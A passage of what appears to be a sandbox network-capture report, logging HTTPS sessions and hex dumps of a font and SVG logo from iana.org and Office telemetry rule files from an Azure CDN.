                            Expires: Wed, 09 Oct 2024 18:55:31 GMT
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Age: 49938
                            Connection: close
                            Content-Type: font/woff
                            Strict-Transport-Security: max-age=48211200; preload
                            2024-10-10 08:17:49 UTC5776INData Raw: 77 4f 46 46 00 01 00 00 00 02 67 40 00 0f 00 00 00 04 7d d4 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 44 45 46 00 00 01 58 00 00 01 38 00 00 01 a0 34 06 28 1b 47 50 4f 53 00 00 02 90 00 00 50 b2 00 00 a4 b6 87 fd a6 05 47 53 55 42 00 00 53 44 00 00 05 31 00 00 09 60 46 0c 8f 23 4f 53 2f 32 00 00 58 78 00 00 00 60 00 00 00 60 f8 c9 f3 ec 63 6d 61 70 00 00 58 d8 00 00 0c 72 00 00 0f b0 52 ed 6e c1 67 61 73 70 00 00 65 4c 00 00 00 0c 00 00 00 0c 00 08 00 1b 67 6c 79 66 00 00 65 58 00 01 3e f4 00 02 14 b4 c1 1d 2c e7 68 65 61 64 00 01 a4 4c 00 00 00 36 00 00 00 36 f8 be 09 8c 68 68 65 61 00 01 a4 84 00 00 00 21 00 00 00 24 0e af 0c 4f 68 6d 74 78 00 01 a4 a8 00 00 11 0b 00 00 25 be 3d ca 78 99 6b 65 72 6e 00 01 b5 b4 00 00 6d
                            Data Ascii: wOFFg@}GDEFX84(GPOSPGSUBSD1`F#OS/2Xx``cmapXrRngaspeLglyfeX>,headL66hhea!$Ohmtx%=xkernm
                            2024-10-10 08:17:49 UTC6800INData Raw: 94 ba 16 8e 36 df d4 a7 ef b6 4d 2f ac df 8b f5 c7 b0 ce 25 72 af 17 ef 76 63 ef 93 0d 4d 09 d9 c5 38 64 0b 67 bd 8b 52 c7 f5 f5 9b b8 ee 8f e4 d8 d7 d9 da d7 39 c7 0f f3 ee 8b 26 7e 93 d5 d4 29 49 ad 0f 50 13 3f 60 a2 50 da 46 e3 9b 86 92 b7 b3 db 93 32 7e 49 f5 61 96 2f 12 da f7 a6 48 75 e0 3c 47 f5 26 db 7f 93 eb fb 26 65 e9 5f 4c a4 2d f1 67 e0 59 13 51 0b ad 2f b3 c7 41 ed 1b d9 3b f5 85 b3 38 41 6e 4c e7 53 8d 26 35 f1 36 23 d8 6a 8e 36 ce 67 4f 51 86 ef 62 9d 53 a6 8e f1 98 f4 9e 4d 26 e5 78 16 72 75 36 b2 fe 74 72 e9 3a ef 5e 27 f7 5a d8 ef 15 d6 59 6c bc 09 c7 e3 67 9d f1 2c f1 b3 e6 07 4d 7c cb 92 0f b2 e4 25 ae 23 7d 9f 7e c9 db 29 88 f5 e8 6e e2 10 ea c5 61 d2 2f f3 d9 97 a9 95 c6 b3 9f e5 8a 9c 35 73 37 ed 90 1e cf 7e e9 3d d5 49 d2 43 0d cd
                            Data Ascii: 6M/%rvcM8dgR9&~)IP?`PF2~Ia/Hu<G&&e_L-gYQ/A;8AnLS&56#j6gOQbSM&xru6tr:^'ZYlg,M|%#}~)na/5s7~=IC
                            2024-10-10 08:17:49 UTC13600INData Raw: 95 92 ea 45 fc ce 96 df 84 43 b3 e4 bb e2 26 7e cb fd 1a cb 47 92 3e c3 fa 9b cd 1b 16 a4 6d b6 bf 82 4f 99 6f f8 f9 ee 92 c5 37 08 a0 e3 e6 a9 43 d4 2c 93 ca af 5f 96 90 33 57 58 72 86 25 6b 99 9e a1 9c 6c bd be 59 76 0c a4 f7 50 b3 76 4b 09 34 45 ca 37 49 4d 3d 97 cf ee 21 3d d3 4b 45 fb e6 08 8d 79 c9 b3 17 f8 ec 28 ea 54 be d7 ef 21 ca d8 21 ae fb 21 f6 7b 88 7a 6a 52 a9 f3 1f 7c ea 3a 5b 1b 27 bb 13 df 5d ec f7 88 a4 b0 30 a2 dd 83 3c 9b 26 4f 51 7f 31 df 73 99 bd d1 3f 7a bb 16 ac 17 76 6f 43 e5 6f cb 07 74 c0 e2 5f f6 ff 47 25 bf af 7e 00 3b 15 9f fa 1f d8 c7 05 d5 43 d8 03 e6 61 1f f3 b8 8a ca df a0 57 62 7d 07 e1 d9 01 6a b0 1a d6 e5 f7 95 e3 51 3a 17 54 f6 af 2c 65 bf 37 01 e9 66 49 61 5f 26 d0 46 4c a0 ac 4f a0 fd 95 92 32 8e 7b 34 4b 1a cc aa
                            Data Ascii: EC&~G>mOo7C,_3WXr%klYvPvK4E7IM=!=KEy(T!!!{zjR|:[']0<&OQ1s?zvoCot_G%~;CaWb}jQ:T,e7fIa_&FLO2{4K
                            2024-10-10 08:17:49 UTC13600INData Raw: 8e 14 56 6d 47 60 6d d9 c7 47 cd 3e 5a 9e 7d ec 80 fc c9 df 08 86 6e f8 7c 4c 49 0c be 15 b5 2a 12 63 e8 19 82 1f 83 47 74 69 34 b8 45 af 88 06 41 ff 1b b8 0c c2 b7 f8 5c dc 54 84 63 a0 8e 7e 8a 20 ac 10 ea 71 24 fd 14 e2 26 08 e3 48 cf f2 da 8a 04 2b a5 0d e7 c4 b9 72 7d c9 93 55 4a 33 3b 8d 4f 3f 70 f3 e9 05 f6 d6 fd c0 c7 db 57 e7 a3 b5 eb 6a 6f e6 ea 66 dd 0b 99 79 93 2f 5f 50 75 b5 b7 b6 04 c1 ea ec c1 fc d9 97 86 8c bc 39 e9 7c ed 99 cf f2 0f 7f ea b7 b1 ac 72 73 78 63 42 c6 25 b1 79 5c 6a 42 22 1c 2d 6a b0 ff f9 16 d2 38 d6 68 b4 08 ea 42 3e 2f 5a 5c 6b db 50 af 18 be 3c b0 13 8e f3 9d 98 93 14 36 b6 0f 2e 72 42 e2 88 38 57 c8 b4 8a e3 38 05 97 d4 d6 ac 0c 55 9c e5 3a 70 76 a4 5f 6f 71 6f 93 55 52 75 d5 7a 59 5b 69 9c 95 0a 36 f3 3e 6c 15 80 b6 fa
                            Data Ascii: VmG`mG>Z}n|LI*cGti4EA\Tc~ q$&H+r}UJ3;O?pWjofy/_Pu9|rsxcB%y\jB"-j8hB>/Z\kP<6.rB8W8U:pv_oqoURuzY[i6>l
                            2024-10-10 08:17:49 UTC16320INData Raw: 2d 19 36 3f 7e 93 7f 7f 3b 6e 7e 8a 7f c3 17 ad b1 2b 7c df 81 c8 39 1b a4 16 6f e2 ec ee 8a 95 04 7f 06 e1 a3 0b 64 6d dc a4 6a 00 6f f9 48 39 e3 6e 5c 89 01 d8 29 71 76 12 87 28 a1 65 ef c5 80 a0 a6 d0 80 cc d4 09 c9 75 93 c7 a7 cc 0f 08 6d 0a d5 5d dc fb e3 d0 8e 21 74 87 36 b7 15 3a 2c 5b 8b f5 5b 0e 5d 5d b1 80 ee f6 59 b8 f4 cc a9 cd 60 5e ba 01 e3 0d b8 0d df 6c 6a 92 6a a3 a8 ac a5 35 23 92 4d 24 d5 46 19 6c 22 d6 2e d5 2c a4 ea 4c 64 00 b5 a1 e4 dc 47 8c 9c 57 92 6c a8 74 a3 0d 15 e3 2e b5 b3 b1 b1 f6 32 c9 e6 e2 ae 98 d4 0a 98 d6 c7 aa 59 0e 55 45 e0 63 88 8d db 93 ed 6e f5 91 8a de 08 25 c9 7b 14 68 38 da ab 6b 4f 50 29 f9 3b 53 bc 03 62 27 25 e5 15 e2 c2 bd b8 8e 3f 85 87 40 e1 c5 1f 4f a8 ba 55 da cd 9d 91 bf 20 4d 54 d3 f3 27 70 da d1 fa 95
                            Data Ascii: -6?~;n~+|9odmjoH9n\)qv(eum]!t6:,[[]]Y`^ljj5#M$Fl".,LdGWlt.2YUEcn%{h8kOP);Sb'%?@OU MT'p
                            2024-10-10 08:17:49 UTC10880INData Raw: b9 c3 54 b5 81 b5 f4 54 ef b1 82 29 55 cf 1b c9 d9 c2 ef 6d c3 cd 1b c1 7b e5 f4 7d 32 7f 44 1f 0f e1 3f 27 f9 83 60 dc 6d 0d 5b 5b 6a a8 1a b7 95 cc 6b 8d 79 6c 56 f5 b7 92 a9 f8 60 fb 55 cc ab 0f b6 5f c5 94 6b b4 8f 51 b5 5f ad d9 5e 4b a2 6a bf 9a a9 d6 98 97 38 7e 5e dc ff b7 79 a1 2d 69 75 20 d0 ff 9f 59 e9 80 4f 0d 17 6a 4d 58 10 1f 23 4d e9 53 fe 6f b3 92 b4 84 cc ca bc a5 b0 06 48 47 f9 0f 1f b1 7e a3 ba 5e b3 96 8e ea 1d 32 84 77 26 73 12 21 cc 09 88 10 b9 81 f8 f7 f7 14 c1 16 c6 df b3 06 11 3f 72 3b 0b ab 97 c4 46 41 9f e3 fa fc 82 bf 22 91 39 cb df cd 95 91 ba c5 9c bf 02 3f 3f a6 e1 df 78 a4 6a 9f c0 b4 69 f8 37 8a 55 ed 13 98 4b 1a ed 3d 84 f6 a8 ed 2f ea f6 04 53 99 f8 19 40 e4 f7 2a 9b 89 59 4d f6 e2 40 7e 8f 9e 54 b5 5f 48 f6 e2 18 fe 79
                            Data Ascii: TT)Um{}2D?'`m[[jkylV`U_kQ_^Kj8~^y-iu YOjMX#MSoHG~^2w&s!?r;FA"9??xji7UK=/S@*YM@~T_Hy
                            2024-10-10 08:17:49 UTC16384INData Raw: 66 86 27 50 25 31 d4 21 6b 73 96 d3 92 ca c5 1d c8 f8 f4 6c 15 6b 37 8e 8e 6a 8e 63 c4 7f 3f b9 ba 66 1d 3b 3e a6 50 4c 17 b1 35 d0 de d4 e8 c9 5a 56 51 a4 ea 64 b3 02 ac ec 92 07 05 23 68 44 2b 46 45 ba 62 ed 52 a2 b9 9f 41 4b 69 cd 3a b6 09 ca 9f 9b 5f c4 36 d6 23 b1 a7 d8 1a 46 1b 35 3f a9 a8 56 62 0a 2f d9 13 d2 41 2c 63 26 12 59 c1 51 1f c4 bd fe 4c e4 84 4c 62 f5 e7 c7 93 bc 89 21 9b 1a 53 51 13 51 ad 6a 96 35 22 e7 17 e2 31 d3 27 b8 a1 82 f1 67 2d 6b 44 53 29 e5 e4 16 fb ce 4d 68 60 eb 48 9c 9c 40 a6 c7 fa 44 d9 e0 65 bd a6 ea d6 e0 48 a3 71 81 2e 7e 73 69 cd 63 47 25 fb 34 8d c2 a3 15 03 a4 3e a5 98 32 61 9f 01 7a ea 41 8d 7a 20 71 ae 9f 4b e0 38 c3 c8 e0 8f f6 a3 c5 fa 22 3a dc 48 73 9f e4 e8 b1 d7 da 1c 2e 35 13 46 30 51 0c 38 0f 81 84 3d 95 05
                            Data Ascii: f'P%1!kslk7jc?f;>PL5ZVQd#hD+FEbRAKi:_6#F5?Vb/A,c&YQLLb!SQQj5"1'g-kDS)Mh`H@DeHq.~sicG%4>2azAz qK8":Hs.5F0Q8=
                            2024-10-10 08:17:49 UTC14896INData Raw: f5 3d ea 62 7a 21 fc fd 51 d2 a9 0b a6 36 b5 16 12 fa 41 63 65 75 1d ae 2f 71 9a 60 c2 89 11 17 ae 64 57 35 f8 27 16 9c 3a 54 8b 5c 66 c0 a7 ad 1a a9 43 c4 81 ea 09 13 de 80 87 93 88 ac ad b5 13 46 ae 5e 6c 64 d8 31 d1 d0 ca 1a 27 70 36 73 88 71 4c bd d6 98 37 b0 e2 84 3a 23 70 9a a9 68 fd 6d 1d fc fb 9e 1a 72 1c 8f 71 86 eb 8d 5a 63 4c 78 82 20 f3 46 7d 51 0f f0 76 36 87 e3 ae c5 1b 18 0e 2f 84 2a d5 e5 b8 34 99 d0 a1 6b 34 95 70 a9 ac e0 0b de d6 8b 5e 87 0d 2f 2c da 3c 1a 73 a7 b5 f1 9e 26 fe fd fa c1 50 4d 54 30 f8 02 19 32 c6 22 53 36 fe f0 4d 8c 9b 7f d4 a1 34 90 a8 50 6f 40 9f d9 84 8e 31 7a 88 93 f8 91 31 8b c5 06 ea 85 28 0d e0 2f 13 c7 4d 9d 8a f8 8a 07 4d da 30 80 32 12 91 7e 02 63 d5 aa 50 ee 84 db 11 5f 9b b7 13 df dd e0 43 81 40 a3 1e cd 2d
                            Data Ascii: =bz!Q6Aceu/q`dW5':T\fCF^ld1'p6sqL7:#phmrqZcLx F}Qv6/*4k4p^/,<s&PMT02"S6M4Po@1z1(/MM02~cP_C@-
                            2024-10-10 08:17:49 UTC16384INData Raw: f0 5e 8a 84 53 20 17 ef a7 74 38 ae da 89 43 df 53 3a 04 49 ed c4 dd 25 df cc bb d8 7a 96 20 28 93 84 83 84 22 a7 1e 46 be a2 0c 94 2e 1c bc 97 4a d3 6a fb bf 53 66 0a ad 34 6d 18 82 5a c6 5d ab 79 bf 79 2f cd 47 d2 92 84 3a 31 4d 99 64 6e 31 37 0b 75 f7 52 09 a5 01 f9 88 7d 50 66 d2 6c f7 22 d0 52 5a ff 66 ae 41 08 16 02 c9 6c c2 8f 9e 98 97 36 ea d8 53 c2 c9 60 f0 a0 1b e7 d1 40 b7 ce 69 10 9c e6 b2 f3 eb 2a ce 97 97 9f af 58 77 be 2c 3d a7 39 77 49 4b 6e 4e eb 92 9c 96 1c 94 57 7e a1 9c fc ad 23 a9 9f 57 e4 b6 e4 e4 b4 d0 c4 dc 66 8e 73 e1 72 b9 74 21 5b 48 65 e7 b7 bc 48 39 5a 32 57 31 90 79 ca 1c 32 47 79 94 cc 4f 96 91 b9 49 19 47 8f a0 79 68 fc e9 29 56 ad f4 ee 2e bd 7b 49 ef 96 74 95 dd 77 fb 77 fb 74 fb ef 01 76 f4 2d e5 f1 3d 3a 83 41 57 37 35
                            Data Ascii: ^S t8CS:I%z ("F.JjSf4mZ]yy/G:1Mdn17uR}Pfl"RZfAl6S`@i*Xw,=9wIKnNW~#Wfsrt![HeH9Z2W1y2GyOIGyh)V.{Itwwtv-=:AW75
                            2024-10-10 08:17:49 UTC6480INData Raw: 3e 87 2f e0 4b f8 32 be 82 af e2 6b f8 46 64 ee 60 2c e2 61 f8 7e 9c 17 3f 25 89 4a 3f 3b f8 36 72 81 92 38 bf 67 87 f5 1f 18 56 7e 28 09 2b 3f da 7f c1 3e 0a 3f 82 47 23 ff 77 97 b0 8c c7 e1 09 78 12 9e 82 5f d0 ce 25 d8 83 f1 53 32 73 9a 99 d3 cc 9c 66 e6 34 33 a7 99 39 cd cc 69 66 4e 33 73 9a 99 d3 cc 9c 66 e6 34 33 a7 99 39 cd cc 69 66 4e 33 73 9a 99 d3 cc 9c 66 e6 34 33 a7 99 39 cd cc 69 66 4e 33 73 9a 99 d3 cc 9c 66 e6 34 33 a7 99 39 cd cc 69 66 4e 33 73 9a 99 d3 cc 9c 66 e6 34 33 a7 99 39 cd cc 69 66 4e 33 73 9a 99 d3 cc 9c 66 e6 34 33 a7 99 39 cd cc 69 66 4e 33 73 9a 99 d3 cc 9c 66 66 30 33 83 99 19 cc cc 60 66 06 33 b3 96 99 af cc 7c 65 e6 2b 33 5f 99 f9 ca cc 57 66 be 32 f3 95 99 af cc 7c 65 e6 2b 0b 7a 0f 9f 62 d6 32 b3 96 99 b5 cc ac 7d 3c 7c
                            Data Ascii: >/K2kFd`,a~?%J?;6r8gV~(+?>?G#wx_%S2sf439ifN3sf439ifN3sf439ifN3sf439ifN3sf439ifN3sf439ifN3sff03`f3|e+3_Wf2|e+zb2}<|


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            37192.168.2.449801192.0.33.84431360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:50 UTC376OUTGET /about/excellence/efqm-committed-2013.svg HTTP/1.1
                            Host: www.iana.org
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-10-10 08:17:50 UTC1051INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:50 GMT
                            Server: Apache
                            X-Content-Type-Options: nosniff
                            Vary: Accept-Encoding
                            Last-Modified: Sun, 18 Jul 2021 22:53:48 GMT
                            Content-Length: 22682
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
                            Cross-Origin-Opener-Policy: same-origin
                            Cache-Control: public, max-age=3600
                            Expires: Thu, 10 Oct 2024 09:17:50 GMT
                            Content-Type: image/svg+xml
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Connection: close
                            Strict-Transport-Security: max-age=48211200; preload
                            2024-10-10 08:17:50 UTC363INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0a 3c 21 2d 2d 20 47 65 6e 65 72 61 74 6f 72 3a 20 41 64 6f 62 65 20 49 6c 6c 75 73 74 72 61 74 6f 72 20 31 37 2e 30 2e 30 2c 20 53 56 47 20 45 78 70 6f 72 74 20 50 6c 75 67 2d 49 6e 20 2e 20 53 56 47 20 56 65 72 73 69 6f 6e 3a 20 36 2e 30 30 20 42 75 69 6c 64 20 30 29 20 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 73 76 67 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 53 56 47 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 47 72 61 70 68 69 63 73 2f 53 56 47 2f 31 2e 31 2f 44 54 44 2f 73 76 67 31 31 2e 64 74 64 22 3e 0a 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 69 64 3d
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?>... Generator: Adobe Illustrator 17.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) --><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" id=
                            2024-10-10 08:17:50 UTC11187INData Raw: 64 74 68 3d 22 32 30 30 70 78 22 20 68 65 69 67 68 74 3d 22 31 32 34 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 30 20 31 32 34 22 20 65 6e 61 62 6c 65 2d 62 61 63 6b 67 72 6f 75 6e 64 3d 22 6e 65 77 20 30 20 30 20 32 30 30 20 31 32 34 22 20 78 6d 6c 3a 73 70 61 63 65 3d 22 70 72 65 73 65 72 76 65 22 3e 0a 3c 67 3e 0a 09 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 32 33 31 46 32 30 22 20 64 3d 22 4d 37 35 2e 31 39 33 2c 35 38 2e 33 38 35 68 31 35 2e 33 31 36 76 34 2e 34 31 38 48 37 39 2e 39 38 31 76 34 2e 30 35 34 68 39 2e 34 32 33 76 34 2e 34 32 68 2d 39 2e 34 32 33 76 34 2e 34 31 38 68 31 30 2e 35 32 38 76 34 2e 34 32 33 48 37 35 2e 31 39 33 56 35 38 2e 33 38 35 7a 22 2f 3e 0a 09 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 32 33 31 46 32 30 22 20 64
                            Data Ascii: dth="200px" height="124px" viewBox="0 0 200 124" enable-background="new 0 0 200 124" xml:space="preserve"><g><path fill="#231F20" d="M75.193,58.385h15.316v4.418H79.981v4.054h9.423v4.42h-9.423v4.418h10.528v4.423H75.193V58.385z"/><path fill="#231F20" d
                            2024-10-10 08:17:50 UTC1360INData Raw: 30 2e 31 36 2d 30 2e 38 38 35 63 2d 30 2e 30 39 36 2d 30 2e 32 37 35 2d 30 2e 32 33 36 2d 30 2e 35 31 34 2d 30 2e 34 32 31 2d 30 2e 37 31 36 63 2d 30 2e 31 38 36 2d 30 2e 32 30 33 2d 30 2e 34 31 36 2d 30 2e 33 36 33 2d 30 2e 36 39 31 2d 30 2e 34 38 31 0a 09 09 63 2d 30 2e 32 37 35 2d 30 2e 31 31 37 2d 30 2e 35 39 38 2d 30 2e 31 37 37 2d 30 2e 39 36 39 2d 30 2e 31 37 37 63 2d 30 2e 33 33 38 2c 30 2d 30 2e 36 35 35 2c 30 2e 30 35 39 2d 30 2e 39 35 33 2c 30 2e 31 37 37 63 2d 30 2e 32 39 38 2c 30 2e 31 31 38 2d 30 2e 35 35 36 2c 30 2e 32 37 38 2d 30 2e 37 37 36 2c 30 2e 34 38 31 0a 09 09 63 2d 30 2e 32 31 39 2c 30 2e 32 30 32 2d 30 2e 33 39 39 2c 30 2e 34 34 31 2d 30 2e 35 34 2c 30 2e 37 31 36 63 2d 30 2e 31 34 2c 30 2e 32 37 35 2d 30 2e 32 32 32 2c 30 2e 35
                            Data Ascii: 0.16-0.885c-0.096-0.275-0.236-0.514-0.421-0.716c-0.186-0.203-0.416-0.363-0.691-0.481c-0.275-0.117-0.598-0.177-0.969-0.177c-0.338,0-0.655,0.059-0.953,0.177c-0.298,0.118-0.556,0.278-0.776,0.481c-0.219,0.202-0.399,0.441-0.54,0.716c-0.14,0.275-0.222,0.5
                            2024-10-10 08:17:50 UTC3474INData Raw: 35 31 2c 31 2e 33 32 33 2c 30 2e 39 37 38 4c 31 33 36 2e 30 32 35 2c 39 32 2e 39 38 39 7a 22 2f 3e 0a 09 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 32 33 31 46 32 30 22 20 64 3d 22 4d 31 34 36 2e 30 35 36 2c 39 34 2e 38 39 34 63 30 2c 30 2e 30 39 2c 30 2c 30 2e 31 38 2c 30 2c 30 2e 32 36 39 63 30 2c 30 2e 30 39 31 2d 30 2e 30 30 35 2c 30 2e 31 38 2d 30 2e 30 31 36 2c 30 2e 32 37 68 2d 36 2e 33 35 36 0a 09 09 63 30 2e 30 31 31 2c 30 2e 33 33 35 2c 30 2e 30 38 37 2c 30 2e 36 35 2c 30 2e 32 32 37 2c 30 2e 39 34 36 73 30 2e 33 32 39 2c 30 2e 35 35 32 2c 30 2e 35 36 35 2c 30 2e 37 37 63 30 2e 32 33 36 2c 30 2e 32 31 38 2c 30 2e 35 30 39 2c 30 2e 33 38 38 2c 30 2e 38 31 37 2c 30 2e 35 31 0a 09 09 63 30 2e 33 31 2c 30 2e 31 32 33 2c 30 2e 36 33 38 2c 30 2e 31 38 34
                            Data Ascii: 51,1.323,0.978L136.025,92.989z"/><path fill="#231F20" d="M146.056,94.894c0,0.09,0,0.18,0,0.269c0,0.091-0.005,0.18-0.016,0.27h-6.356c0.011,0.335,0.087,0.65,0.227,0.946s0.329,0.552,0.565,0.77c0.236,0.218,0.509,0.388,0.817,0.51c0.31,0.123,0.638,0.184
                            2024-10-10 08:17:51 UTC6298INData Raw: 39 2c 30 2e 37 34 38 2c 30 2e 31 37 37 2c 31 2e 30 39 36 63 30 2e 31 31 38 2c 30 2e 33 34 39 2c 30 2e 32 39 2c 30 2e 36 35 35 2c 30 2e 35 31 35 2c 30 2e 39 31 39 0a 09 09 63 30 2e 32 32 35 2c 30 2e 32 36 34 2c 30 2e 35 2c 30 2e 34 37 35 2c 30 2e 38 32 36 2c 30 2e 36 33 32 63 30 2e 33 32 36 2c 30 2e 31 35 37 2c 30 2e 36 39 36 2c 30 2e 32 33 36 2c 31 2e 31 31 32 2c 30 2e 32 33 36 63 30 2e 34 30 35 2c 30 2c 30 2e 37 37 33 2d 30 2e 30 37 39 2c 31 2e 31 30 35 2d 30 2e 32 33 36 0a 09 09 63 30 2e 33 33 32 2d 30 2e 31 35 37 2c 30 2e 36 30 35 2d 30 2e 33 37 31 2c 30 2e 38 31 37 2d 30 2e 36 34 31 6c 31 2e 30 36 33 2c 30 2e 39 36 31 63 2d 30 2e 33 33 37 2c 30 2e 33 39 34 2d 30 2e 37 35 39 2c 30 2e 37 2d 31 2e 32 36 35 2c 30 2e 39 31 39 63 2d 30 2e 35 30 36 2c 30 2e
                            Data Ascii: 9,0.748,0.177,1.096c0.118,0.349,0.29,0.655,0.515,0.919c0.225,0.264,0.5,0.475,0.826,0.632c0.326,0.157,0.696,0.236,1.112,0.236c0.405,0,0.773-0.079,1.105-0.236c0.332-0.157,0.605-0.371,0.817-0.641l1.063,0.961c-0.337,0.394-0.759,0.7-1.265,0.919c-0.506,0.


                            Session IDSource IPSource PortDestination IPDestination Port
                            38192.168.2.44980513.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:50 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-10-10 08:17:50 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:50 GMT
                            Content-Type: text/xml
                            Content-Length: 486
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                            ETag: "0x8DC582B9018290B"
                            x-ms-request-id: 0f93c021-e01e-0020-05fb-19de90000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241010T081750Z-185b7d577bdt2k4f7f9nr1pp7s00000001s000000000g5d2
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-10-10 08:17:50 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            39192.168.2.44980613.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:50 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-10-10 08:17:50 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:50 GMT
                            Content-Type: text/xml
                            Content-Length: 407
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                            ETag: "0x8DC582B9698189B"
                            x-ms-request-id: 50d1697f-101e-008e-7283-1acf88000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241010T081750Z-185b7d577bdvng2dzp910e3fdc000000027000000000gfa7
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-10-10 08:17:50 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 